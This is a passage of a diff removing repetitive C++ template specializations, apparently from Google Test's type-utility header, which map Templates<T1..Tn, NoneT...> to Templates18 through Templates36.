-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates18<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates19<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates20<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates21<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT> {
-  typedef Templates22<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT> {
-  typedef Templates23<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT> {
-  typedef Templates24<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT> {
-  typedef Templates25<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT> {
-  typedef Templates26<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT> {
-  typedef Templates27<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT> {
-  typedef Templates28<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT> {
-  typedef Templates29<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates30<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates31<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates32<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates33<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates34<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates35<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29,
-    T30, T31, T32, T33, T34, T35, T36, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates36<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
